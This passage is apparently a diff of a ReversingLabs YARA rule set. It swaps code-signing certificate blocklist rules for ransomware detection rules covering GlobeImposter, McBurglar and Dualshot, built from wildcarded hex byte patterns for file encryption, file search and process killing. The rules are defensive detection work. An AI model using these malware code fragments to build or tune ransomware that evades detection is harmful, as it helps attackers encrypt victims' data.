+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GlobeImposter ransomware."
 		author = "ReversingLabs"
-		id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4742-L4760"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GlobeImposter"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_1 = {
+            81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24
+            ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ??
+            ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84
+            74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24
+            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ??
+            50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50
+            55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
+        }
+		$search_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6
+            8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A
+            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89
+            04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ??
+            FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74
+        }
+		$encrypt_files_2 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ??
+            FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44
+            24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
+            ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B
+            CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ??
+            ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ??
+            50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
+        }
+		$kill_specific_processes_2 = {
+            81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89
+            74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36
+            53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB
+            53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4
+            24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D
+            44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2
+        }
+		$kill_specific_processes_1 = {
+            81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ??
+            53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C
+            24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8
+            0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0
+            55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24
+            ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF
+            15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ??
+            50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2
+        }
+		$encrypt_files_3 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ??
+            ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24
+            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15
+        }
+		$search_files_2 = {
+            53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ??
+            ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84
+            24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50
+            FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ??
+            ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C
+            24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9
+            51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A
+            ?? 8D 44 24 ?? 50 56 FF 15
+        }
+		$kill_specific_processes_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF
+            ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57
+            E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24
+            ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24
+            ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ??
+            ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55
+            8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and ( pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures [ i ] . serial == "f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" ) and 1598347687 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $search_files_1 and $encrypt_files_1 and $kill_specific_processes_1 ) or ( $search_files_1 and $encrypt_files_2 and $kill_specific_processes_2 ) or ( $search_files_2 and $encrypt_files_3 and $kill_specific_processes_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects McBurglar ransomware."
 		author = "ReversingLabs"
-		id = "d7396af1-2eae-594a-9933-3d148503c0ea"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "11816401-87c3-5aff-b161-da0fa4eb4bca"
+		date = "2021-09-27"
+		modified = "2021-09-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4762-L4778"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "McBurglar"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_env = {
+            00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ??
+            ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ??
+            ?? ?? 00 2A
+        }
+		$encrypt_files_p1 = {
+            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ??
+            7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
+            00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$encrypt_files_p2 = {
+            00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ??
+            ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ??
+            ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ??
+            13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69
+            6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13
+            ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A
+        }
+		$find_files = {
+            00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ??
+            00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32
+            ?? 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$generate_salt = {
+            00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00
+            00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06
+            13 ?? 2B ?? 11 ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures [ i ] . serial == "03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $generate_salt ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dualshot ransomware."
 		author = "ReversingLabs"
-		id = "cc49f477-269a-55af-8344-39d2f24c1e7f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "17828c85-0f1b-581b-842a-24e6f26e0b4d"
+		date = "2020-11-20"
+		modified = "2020-11-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4780-L4796"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
